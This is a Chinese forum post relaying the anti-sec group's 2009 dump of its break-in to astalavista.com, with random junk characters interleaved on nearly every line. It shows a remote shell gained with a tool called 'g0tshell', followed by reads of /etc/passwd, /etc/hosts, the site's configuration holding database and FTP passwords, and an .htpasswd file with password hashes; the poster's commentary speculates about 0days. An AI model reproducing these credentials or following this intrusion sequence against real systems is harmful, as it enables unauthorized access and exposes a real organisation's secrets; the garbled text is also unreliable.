里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。
$ ?, q7 I+ G+ p4 n4 D$ y! V
& ?- l: f5 |6 Y. l2 X/ E' u[root@front3 ~]# curl -I litespeedtech.com+ T. J( h* X/ U1 d" f6 x: _0 @
HTTP/1.1 200 OK
/ Q( F% \! J& u+ GDate: Fri, 05 Jun 2009 22:54:51 GMT
4 k+ j, D4 ^+ V2 L" h0 `1 W% B$ bServer: LiteSpeed
) G4 _! h( i9 P9 `) ~* J2 l3 |( ~$ \7 i @0 ?) G( \
另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3 x64还有一个localroot 0day -_-
* y- l! }, h* c6 n' J+ U j1 V- V7 j5 X3 s+ @
有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。9 M0 h0 `3 J9 p6 r1 h8 z5 I
9 I) `" F2 H3 V8 L, K9 @+ ]% ~
: _0 s, G+ t7 o: k
/ _ \ / _____/\__ ___/ _ \ | | / _ \ \ / /| |/ _____/\__ ___/ _ \
' G) N; A) V% s& Q/ /_\ \ \_____ \ | | / /_\ \| | / /_\ \ Y / | |\_____ \ | | / /_\ \
( i, L* k) G, j/ | \/ \ | |/ | \ |___/ | \ / | |/ \ | |/ | \6 t2 ~4 b7 K& ~! C
\____|__ /_______ / |____|\____|__ /_______ \____|__ /\___/ |___/_______ / |____|\____|__ /7 [8 v- t' s: t8 B) T
\/ \/ \/ \/ \/ \/ \/
$ d& \% y7 y' F: l6 l, g t1 y2 G The Hacking & Security Community6 q3 C, }) `& Q) a
[+] Founded in 1997 by a hacker computer enthusiast
5 e0 ?; Q H6 W& I+ w; R' I6 j% O- T[-] Exposed in 2009 by anti-sec group0 k ^# T( v1 d5 Q4 b
7 d- w4 D& T, D0 nFrom < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:
7 G- D% K% N% E3 F5 W' F>> 03. Who’s behind the site?& G" j8 e0 B' p, L5 p8 G
>>+ g$ ?" Z' a: }# O7 G
>> A team of security and IT professionals, and a countless number of contributors from all over the world.
+ \- E Q0 U0 g9 x+ A& q
4 d) v/ i! r% _/ _% M3 k>> 05. Is it true that the site is visited by script-kiddies and warez fans only?
3 M; k( M; X% g8 s9 Y: H>>
7 n/ e% R* w9 V4 I u, s>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and
' ~8 B( U& b- f1 y- Vmilitary institutions. }& q# k5 L s8 V8 u y' W5 H
>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.
8 b# \, }6 l% p( L( G. @! J8 S. M7 J% Q' E
Why has Astalavista been targeted?
+ t7 s p+ g7 n& K* B0 r4 u6 i \2 A- _( p- x F+ {
Other than the fact that they are not doing any of this for the “community” but9 b6 E# V4 ^7 F* n# j$ Y
for the money, they spread exploits for kids, claim to be a security community+ N& b' _6 o2 R$ u. A% |
(with no real sense of security on their own servers), and they charge you $6.66
2 i, H& n% }0 ^8 p, e2 y& Q; y. U, ^per months to access a dead forum with a directory filled with public releases
2 F E \$ V$ L2 u3 ]and outdated / broken services.* J7 A! x5 @% ^. g) B
/ ]; W/ }( o4 d8 Q0 N5 q, m
We wanted to see how good that “team of security and IT professionals” really is.6 b) m$ [! j, O* G0 p: L
: {) H8 z: `5 ^. n
Let’s begin.& z/ w: p2 K+ c% t% V4 w
2 ]+ x' [+ |( B m8 w* W) y4 n! q
anti-sec:~# ./g0tshell astalavista.com -p 80# F5 D& T; W% t; u* A( d
[+] Connecting to astalavista.com:80( T% V, D) ]8 d9 [: I: ]2 n2 T: y
[+] Grabbing banner…* N9 ~* Z& M0 t- z
LiteSpeed0 t' Z! s5 `; b9 ? u
[+] Injecting shellcode…$ w/ S4 ~6 l6 [' p8 d+ i
[-] Wait for it
& t* k2 Q, ~. I( U0 M9 W- _, d. ^- [1 H# x. x7 E5 ~' A {
[~] We g0tshell
( d' v( _% |" X/ X6 R; @3 M- Huname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux. `6 L& H# E+ F. b: V @( ?# c& @
ID: uid=100(apache) gid=500(apache) groups=500(apache)
0 |' p& a& ^ k9 w8 `3 v' O8 b7 g* g
3 u e$ u1 k% msh-3.2$ cat /etc/passwd
& B' }7 y% f3 Y: ^4 Vroot:x:0:0:root:/root:/bin/bash
3 K" ^3 V B5 E! bbin:x:1:1:bin:/bin:/sbin/nologin
) ^0 d" Y2 p* p. a* _( z. }' kdaemon:x:2:2:daemon:/sbin:/sbin/nologin& D- j( I; x2 g& b2 z* w
adm:x:3:4:adm:/var/adm:/sbin/nologin7 p* n5 B) g5 m# W
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
$ i& p2 P9 n' L$ S5 ]2 u& j+ l6 _sync:x:5:0:sync:/sbin:/bin/sync. |, k0 S0 F$ O) [% U3 l
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
# y$ W( ~! \; Rhalt:x:7:0:halt:/sbin:/sbin/halt
% j9 x* n$ [* ~( jmail:x:8:12:mail:/var/spool/mail:/sbin/nologin* K' ~! g$ g8 c/ S$ h/ Y1 E
news:x:9:13:news:/etc/news:
! I5 z6 k2 e$ D3 ]. ?% Juucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin9 P3 K4 R- D2 M" V2 s# i5 `7 A
operator:x:11:0 perator:/root:/sbin/nologin
, @4 Z# q9 m' x% }games:x:12:100:games:/usr/games:/sbin/nologin; G* E& @: d- b% C/ Q3 J9 k
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin% M& }3 @- K6 ~3 l! o& Z+ d7 a
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
" i" z. E1 Y _/ @, O4 r( U1 L* T8 knobody:x:99:99:Nobody:/:/sbin/nologin
1 Z4 `: K6 v7 o% C! {# E$ J8 _rpm:x:37:37::/var/lib/rpm:/sbin/nologin; ~! `* E! Q4 J( V3 y! g9 X3 L
dbus:x:81:81:System message bus:/:/sbin/nologin' A3 X1 O% q1 }, L' Y3 ~: i
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
7 ?2 O6 S* Z/ k" [# Ymailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
/ \$ ^# a: |3 I% q+ csmmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
9 }! B; V* P. ^( R5 ?& Zvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
. ]& ]' t; z" V: d4 T( [' j9 ahaldaemon:x:68:68:HAL daemon:/:/sbin/nologin2 }) M/ E8 U" ^" b: x( I& p% s
rpc:x:32:32 ortmapper RPC user:/:/sbin/nologin
0 o& J; \5 U# v- Irpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin) Y7 ]) @7 T5 K! _
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
8 @! F5 o" T3 L8 y. D+ s5 Bsshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin6 C- H7 J$ c4 |* u
pcap:x:77:77::/var/arpwatch:/sbin/nologin
( o$ Z8 Q9 [$ ^- {+ j4 J" l* Rnamed:x:25:25:Named:/var/named:/sbin/nologin& J0 z; G; S2 |' ^
apache:x:100:500::/var/www:/bin/false" D" i, O; E8 w* M6 A9 Z# h
diradmin:x:101:101::/usr/local/directadmin:/bin/bash; u5 A5 P9 d0 J, ~* K
mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash
5 f2 o! G0 g$ S- f4 rwebapps:x:500:501::/var/www/html:/bin/bash3 H! P2 j, A% r; g8 }
majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash' S0 M& u$ V0 @
admin:x:501:502::/home/admin:/bin/bash; M9 d8 t7 c- p& S9 R; u* _3 ]
jon:x:502:503::/home/jon:/bin/bash& W5 o+ A3 T7 H( L; {% A9 _5 Y
com:x:503:504::/home/com:/bin/bash
3 j) {% i/ B+ x% Entp:x:38:38::/etc/ntp:/sbin/nologin
7 V3 s6 {' T% I& ?ais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin
1 D; Z% p; U7 Y$ ~6 v$ L& Lastanet:x:504:505::/home/astanet:/bin/bash
8 }+ J6 h6 x! F, E, yavahi:x:70:70:Avahi daemon:/:/sbin/nologin
6 d+ O$ t( W3 u9 d' F9 N) cavahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin8 ~0 o, j& z9 i6 S9 L! q
% I; N y# h: B- T$ p
sh-3.2$ cat /etc/hosts3 t2 R6 `9 ?/ [! b" c
# Do not remove the following line, or various programs4 j. i8 v7 |$ a! @
# that require network functionality will fail.
! e1 w4 C* s R0 H1 p, a127.0.0.1 localhost.localdomain localhost; d/ Z0 k3 q/ R" O# P* h- A8 ^' L- p
::1 localhost6.localdomain6 localhost65 m/ t) }% T- w2 }! b) M% b2 M# p' E
80.74.154.172 asta1.astalavistaserver.com9 ^; m/ k6 w! B" i, R! y; o# w/ T
; ]& _7 D, q9 T7 M" i, Zsh-3.2$ pwd
6 @8 L) y2 ~% @. y/home/com/public_html2 R+ ]1 n7 Y, S3 O! ^% {
# [% o) X' y( T9 j4 @
sh-3.2$ ls -la, Z1 L. j9 u O. H* n
total 18460
& `. f4 x$ B, e5 Kdrwxr-xr-x 30 com apache 4096 May 28 17:06 .
# u, a3 ?+ ^) J$ o, W7 {/ bdrwx–x–x 11 com com 4096 Jun 25 2008 ..
! s6 `6 u \8 H0 `drwxr-xr-x 2 com com 4096 Feb 2 19:29 admin( m- o' h/ U# i i& h
drwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache
. i+ h. _ A6 V# k% Ndrwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin; T: i @: {0 C v/ R8 Y4 y0 l
drwxrwxrwx 2 com com 4096 May 19 00:50 config1 x+ E! S6 m' o- l
drwxr-xr-x 2 com com 4096 Mar 20 11:05 core
, v) j8 B# X$ {8 W: idrwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules
( R& O, `! ?- C6 M3 D- g3 C% edrwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing
3 \! V( x U* Pdrwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo, O( O1 X! r* O) P4 J1 [2 u
drwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__
8 x4 D" b2 H! k4 w( ?-rw-r–r– 1 com com 8035 May 19 14:26 directory_to_mediadir.php
! d+ }' C/ j& C& @drwxr-xr-x 2 com com 4096 Sep 9 2008 dvd C* y5 d& L: l8 Z" G; {
drwxr-xr-x 3 com com 4096 Feb 2 19:29 editor
- q2 A5 T# u. j& K2 J8 q* a+ ?+ G+ T-rw-r–r– 1 com com 3750 Feb 27 16:12 favicon.ico
6 _( G8 w9 w% s" Pdrwxrwxrwx 2 com com 4096 Jun 4 08:00 feed
9 g6 P, p0 U% T' |0 ]# p) U-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess J* L( m4 P& Y1 m
-rw-r–r– 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak
2 {# {+ B$ y. W& R-rw-r–r– 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak9 r! U& r7 Y, I% X
drwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool
7 Q/ D- j8 J/ y: h R& Jdrwxrwxrwx 14 com com 4096 Feb 2 19:29 images, `" P# j. ^' a2 @" h# o5 _9 j7 w
-rw-r–r– 1 com com 97496 Jun 2 13:01 index.php$ s6 K4 X2 Z; W e% s
drwxr-xr-x 6 com com 4096 Feb 2 19:29 installer
6 }! v0 L( \5 O, ^4 n* idrwxr-xr-x 8 com com 4096 Feb 2 19:29 lang. W0 Y n' P8 e) ^1 N8 T1 U& q) ?
drwxr-xr-x 22 com com 4096 Feb 2 19:29 lib) z% _# M' w V+ u+ D7 I; N
drwxrwxrwx 12 com com 4096 Jun 2 07:47 media P2 t# ]2 l7 z4 |
drwxr-xr-x 8 com com 4096 May 11 12:48 modifications
& m$ g7 F7 g8 I/ Qdrwxr-xr-x 34 com com 4096 May 28 16:30 modules# D |. ?# S) U# z5 _ m
drwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin) V- {7 R( D. r* A
drwxrwxr-x 22 com com 4096 May 28 17:06 _new
% g1 G6 _- ?$ @/ Q* A7 ~* b" R% h7 hdrwxr-xr-x 26 com com 4096 Feb 2 19:27 _old
: h8 y+ l9 q2 |; ]& Udrwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy9 L3 M6 b6 v& E. E: N
drwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy
% S* a, I% g* A+ E% X-rw-r–r– 1 com com 26 Feb 2 19:33 robots.txt! t9 K1 Q6 ~# x4 A1 h T8 v2 T
-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml8 e |7 D- x, M9 s4 ~, O, N7 ?6 `% `/ }
-rw-r–r– 1 com com 223 Mar 30 15:32 test.php
G/ P7 Q7 [, B8 v* N+ Rdrwxrwxrwx 8 com com 4096 Mar 6 13:15 themes
3 w* @! B+ S8 bdrwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp& R" l/ k) S; h3 e) \* ~ m
drwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam
9 p8 ^0 k5 y; c1 Y
4 h' [7 h% o+ u, t# S8 a6 g7 Fsh-3.2$ head -20 index.php! K7 P$ l9 i$ a4 s0 k' D
<?php. {! I; s6 `) L6 r% g& K
. U7 Z/ Y ^; G4 c9 F9 [% I; O- Y9 c
/**# f( c1 m$ G2 u$ T
* The main page for the CMS N/ L: a' z8 Z1 d/ C% m r- b) m
* @copyright CONTREXX CMS - COMVATION AG
0 O2 I1 Q& B1 z5 B3 ~; D5 G0 ~2 ]* @author Comvation Development Team
9 S" W: G8 M' @* @version v1.0.9.10.1 stable
8 W" l; e! P) t* @package contrexx
; ~" B; e" ?0 \# D5 C$ C/ {) I* @subpackage core$ ]4 }$ Q4 m2 O' Y, X2 E0 X
* @link 链接标记[url]http://www.contrexx.com/[/url] contrexx homepage
7 t( Z+ h5 E* `$ |* @since v0.0.0.0
, D# d; _- Y" d1 [3 q: }$ i* @todo Capitalize all class names in project) h+ A: y# g- k0 x6 d
* @uses /config/configuration.php$ ]8 q. s- C: s5 b4 d9 o; o
* @uses /config/settings.php
- r5 v y) _- ?* @uses /config/version.php& K3 n% _2 `- G
* @uses /core/API.php
" b1 P0 d. x! h% N6 @5 q* @uses /core_modules/cache/index.class.php, `8 d7 @ J: M& n. @9 e6 i8 b
* @uses /core/error.class.php
/ J' a& [3 [7 I U" K* ^# v* @uses /core_modules/banner/index.class.php
5 ~* @4 B$ @& ?* @uses /core_modules/contact/index.class.php
. `' V/ G0 {& F9 _( H- K1 o) x7 }" y/ ~3 X
sh-3.2$ cd config/
" l+ G9 ^9 `( {, v% b7 Vsh-3.2$ ls -la
$ I8 q$ m; }$ L8 o% Q" ototal 32
7 c9 L+ M. h/ ~( N" B" J; _drwxrwxrwx 2 com com 4096 May 19 00:50 .) i7 Z; U5 e$ e) a0 F/ E
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..$ _: C# V3 S' [3 G4 R
-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php0 J0 y9 Y1 r; j3 ~6 ~! W& b* M3 G
-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php) \. h5 G; N" ^: u/ \% h5 T0 H7 ?
-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php
7 j! m; C' O0 I' \) c-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php
/ r" _7 e. O) ]" t; g. J
0 X* c5 J0 V9 R5 c# Q$ T1 K* Fsh-3.2$ cat configuration.php
) S) ~, B1 B! }$ o1 P- G[snip]
. j }3 G1 Y6 D) l/ ]$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost
3 o! X% m% F, K9 h' r/ Z: Z+ Y$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name# Z3 T" |% Z9 `9 t! Y
$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix8 ]9 b5 t. k1 b/ k
$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username
! S; I3 K( r4 s. Y; G6 @5 |" {& [$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password
: k- i6 H) Z3 [ ?. m1 D8 u$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)
$ D1 l! T' ^* w B U, X* T$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..)
. P7 ?) N5 z; d1 K1 K& g$ o% r[snip]
6 I: y+ F* k7 Z7 u$_FTPCONFIG['is_activated'] = true; // Ftp support true or false* s3 B+ U( y- \
$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode
5 ?2 W" [. [; O& t0 q7 O2 E+ R$ Z$_FTPCONFIG['host'] = ‘localhost’;// This is normally set to localhost: Y- `2 I/ V6 [- Y. L
$_FTPCONFIG['port'] = 21; // Ftp remote port6 {( Y# P0 }5 ^9 u4 B
$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username+ l* ?' s/ Z, p, H
$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password
- A: h% A% {9 E9 ^, S$_FTPCONFIG['path'] = ‘/’; // Ftp path to cms% N( b, {+ L0 N" ~3 h
5 W# u/ ^6 P1 h/ I/ e
sh-3.2$ cd ..( d* ~& t9 F/ X& p# N
sh-3.2$ cd dvd/
. D# }4 `6 C. w$ x4 _' bsh-3.2$ ls -la3 E* K1 }8 Z: \$ h9 s
total 2913780
6 w; Q4 l- m- m1 X9 L f3 \( K: b( Gdrwxr-xr-x 2 com com 4096 Sep 9 2008 .
! ]: I: k3 d, ddrwxr-xr-x 30 com apache 4096 May 28 17:06 ..
( F2 V& L8 P- e4 @ u-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar; ?2 c: ~! @0 I% l
-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar
$ b: {' M6 F! e) w5 w-rw-r–r– 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar$ P! {/ U2 N" C9 A- j
-rw-r–r– 1 com com 115 Jan 29 2008 .htaccess2 y5 G+ D0 _2 m/ h3 \8 N7 a Y
9 `; [! p& U: J% g) w; `0 \sh-3.2$ cat .htaccess
; g7 ]# n' q5 g, H5 \2 g" P* {$ yauthType Basic, U1 K+ O5 |, e0 g
authName DVD, N/ k4 a) O& I( T% @
authUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd, @# j5 F" m% W2 O- k1 l4 f
require valid-user" H3 V4 L E% S$ X$ L
# A s; s6 ]6 u( V9 V5 R! @
sh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd0 `6 V# j7 o. k, }5 n; i/ W
DVDdownload:CRD8cuY6.MPT6
) D# _5 q( I( ]) r. gDVDdownload2:CR8a36.wluFMg
; ~, _' i, p, U/ s8 H# T/ `0 W
% P0 J1 `) v1 i" ? n" L5 s# M/ Tsh-3.2$ cat test.php9 n+ k( T8 g: @! X4 x% x/ F
<?php
) a$ l0 g v o; R% X$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;
" p: k8 y8 _4 V$url = str_replace(array(’&’, ‘&’), ‘&’, base64_decode(rawurldecode($url)));
& c/ K. ~/ G9 y: h1 pecho $url;
! X$ Q, w$ w( I. X# m# ^?>4 Y5 l. E( M! a! X+ u/ W$ G! D
: y( \0 Q! L) h
sh-3.2$ cd modifications/, W$ q) u( w' v' ]- d+ w
sh-3.2$ ls -la4 P2 n% L$ h j; h" m. ~+ ^3 c
total 32
, a# Z3 q5 v) pdrwxr-xr-x 8 com com 4096 May 11 12:48 ., h9 n7 _- s4 n: |1 K
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
9 E; D8 T5 S, I: Ydrwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng
3 [& z3 C) G4 S$ R H3 udrwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs
: ]. t2 ?/ G3 x& bdrwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools4 n1 R. U( W- t% w
drwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc
" P& o' m( U" Q" p! ~* p: V; g+ A( A8 e) udrwxr-xr-x 2 com com 4096 Feb 2 19:33 search
9 U; _4 c' @- c- y7 Qdrwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp
! n( D% @8 q0 C2 ^; g
7 c& u, P& P: R# b) v% U9 ash-3.2$ ls -R
0 O' `; ?2 b3 P) i$ @.:
) q0 f# n8 u+ T4 jcom_avtng cronjobs onlinetools pjirc search _tmp' B, d$ v/ s9 O' Q F: V2 w
3 Q! ~, p4 E j5 R3 E6 D7 Z. G/ j./com_avtng:9 Z) w* ~! E5 s
avtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts1 ^/ e2 M$ F/ d0 _$ J
2 G9 Z- r% @7 @. i./com_avtng/scripts:$ k6 E2 A/ O6 b4 }7 T
popunder.js0 T) D8 U( O! M/ N9 H" e
" @9 {1 Q, o: N4 }% W G
./cronjobs:
, Q* I! L' C5 lexploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp
! x$ ]- u6 t% d- _
. m' K" x3 O4 T7 V; C4 V7 K: q./cronjobs/tmp:
# E5 f' B2 }+ P: V: Ycontrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv
' D% P- \4 {1 f- I" i8 F0 D" p% H- a/ h
, f* s+ H, ~+ e" L) j+ n$ V./onlinetools:$ x& N/ `* ?0 d3 t3 W% n7 ^" @
index.php
: X, m2 l2 Q# ~/ a
. k/ j" C) p. I5 Q( Y4 D6 @./pjirc:+ H5 F7 ]& {! `
a_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt
! A# G( Y1 x+ M# p: i2 iAppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt
0 Q( _$ U9 u' Ebackground.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd
" [1 \4 w# a8 `1 [. _
9 b- U d% T) Z4 v./pjirc/img:
4 [' p1 N8 P2 N4 _1 \/ k* e7 |ange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif
+ B% C+ h/ E; [* x1 J* T( parbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif
+ i+ W; m- Y6 q+ ]' I. x% [ n7 b! }5 qverre-eau.gif
9 c+ ~+ k+ t# k! O) L, Rargh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif
{, C; R. W. Y) h4 d+ y7 @& Qverre-vin.gif4 D3 d5 U: e7 w$ B- q
ballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif
2 K1 {' m# l6 Ibiere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif4 }9 v( i+ n# V, ^: t- x3 A
; S$ {; {/ I4 o4 O( p+ ^; {1 K./pjirc/snd:3 q o% |0 g7 e8 K W8 ?
bell2.au ding.au
+ I5 L4 ^1 q% u' L
/ P9 J6 v" h0 \/ i: ?" Z( O./search:
4 G$ t* a1 o+ {3 d1 e( y7 UsearchEngines.php search.php& Y$ o4 G( k# s7 ]$ ]& P' W
2 Y! q% n) y) l$ {. H8 U; O
./_tmp:5 K2 C3 x9 c& A( c7 l( E5 P5 h
defaultPorts.php defaultPorts.txt
$ k# g6 P. O: T
9 v! F# I/ y& V4 ^7 `sh-3.2$ cd cronjobs/) Y" u0 u( Z2 H2 V+ m, @
sh-3.2$ cat exploits.php" S% A- o* x/ w) Y8 X4 r
[snip]
. J% ]$ ^. x. V2 K% A6 V5 c$categories = array();1 B) g8 P7 N+ l' ~
$milw0rmFile = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;
( ]; ^5 V" G/ y( Z$expolits = file($milw0rmFile);
z- w1 S/ f4 ~8 R6 J- w1 k1 V$comExploits = array();* e+ q# R# b2 N2 N: d
[snip]3 x# V& q+ Z$ U# f W' b5 _1 L& L
// manage data% b. a% s7 }; N
for ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 26409 `1 @/ K, y! W& e6 M8 o' t& @5 S2 e
" k: p4 j5 E! V6 t // get path and title6 N! U- t8 [. N, F& f# b0 F8 ^2 G
$expolits[$x] = trim($expolits[$x]);1 i7 p$ w( z: h$ K( v" T/ e$ W2 c
$path = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));# j+ h" _0 X4 t8 i, ~8 H
$title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);
$ O7 Z& b0 q4 H B+ P; p9 c$ C6 e$ m" e; Q1 j
// check if file exists2 X2 L3 L. O" ~. ]- q* _) L7 y
if (file_exists($path)) {3 s+ K7 O/ K% p
' G7 }& K: Q. v $text = file_get_contents($path);( o3 m4 n3 e. y, C
" j& l; X1 g1 {- D ~5 [' Q. j // get content and date
) _' K( k/ p6 p6 f( o" `! j& X //$text = htmlspecialchars($text, ENT_QUOTES);# j; G! y5 P; y1 |; V0 R
$tmptext = addslashes(htmlentities($text, ENT_QUOTES, “UTF-8″));% a( V K) |+ Z" k/ A4 n, O
if ($tmptext != ”) {
: G. T& \- p2 f% U2 m $text = $tmptext;
( ^9 G9 \0 [) }# {5 T5 M } else {
- x9 b; K% v9 o! j6 o2 o $text = addslashes(htmlentities($text, ENT_QUOTES));
2 `2 v9 @; s. e" {: G }
4 l C/ z4 z* I4 q- J; A6 r' `3 P( u $date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));
8 O1 V$ c( ^0 E6 m1 g $tmp = explode('-', $date);- V$ X! z) X! c1 @* T6 c
$date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));6 C8 p3 J: a5 @
$cat = getCategory ($path);7 B7 A3 V" J* @7 \9 z3 g/ I: T
$ext = pathinfo(basename($path));4 X) V( f7 \0 o3 X6 F
$ext = $ext['extension'];
: d& g( E% V' S+ d: m $qStr = ”
. Z* \) c" b1 V SELECT `id`0 S" D* t3 y' z+ B: Z0 a
FROM `contrexx_module_exploits`
; Y8 t* D M% Q5 z. G2 k WHERE `title` = ‘” . $title . “‘
5 z2 D [$ ~( I o! n AND `date` = ‘” . $date . “‘
; {0 `5 k0 H1 l$ d: H' `+ N “;5 D, x) i' H5 n- b
echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;
3 N% c, \; Q/ {' R. p3 t $q = $_objDB->query($qStr);6 e! [2 X* W' g
. u) U8 o+ A' B( _3 B6 r+ t; g: i if ($q->numRows() == 0) {
) c9 C3 j6 o7 Q. \2 Z
1 K; |! H$ V G // prepare array
5 l& ]* G G. r" L+ l7 h $comExploits[$x]['date'] = $date;
3 G5 ~2 D( A: j, `* d" f% ` $comExploits[$x]['title'] = $title;
+ N- t R) K3 e; p $comExploits[$x]['author'] = ‘milw0rm’;
" s4 m" q H. W3 H$ p/ r $comExploits[$x]['text'] = $text;
4 ]) ?3 R/ l" Y! Z7 _: [( |2 ` $comExploits[$x]['source'] = $ext;& [5 v; O R) U! P- M2 ]
$comExploits[$x]['url1'] = ”;% V3 P% b2 A) g* D( l, W9 f
$comExploits[$x]['url2'] = ”;* p( g7 ~0 f: P# L, m
$comExploits[$x]['catid'] = $cat;
9 n" U( [4 R0 x* q* k" ?6 |9 S2 K, |7 f $comExploits[$x]['lang'] = ‘2′;! `4 {1 w, ~5 S! J, G3 |0 S# E
$comExploits[$x]['userid'] = ‘12′;
& r i1 {! Y. V $comExploits[$x]['startdate'] = ‘0000-00-00′;
* {1 t, t$ ~' \7 S. n% W $comExploits[$x]['enddate'] = ‘0000-00-00′;0 I8 H, m# U O/ f2 P. f4 ^, f
$comExploits[$x]['status'] = ‘1′;
3 }5 ]% a7 C- D; h0 W+ f $comExploits[$x]['changelog'] = $date;
; @% j- `% S8 `$ i; L y( Q ~6 J& K9 ]) E: A3 q
}. J/ {5 x2 s& t5 f
[snip]& Z! p* `! W) ~
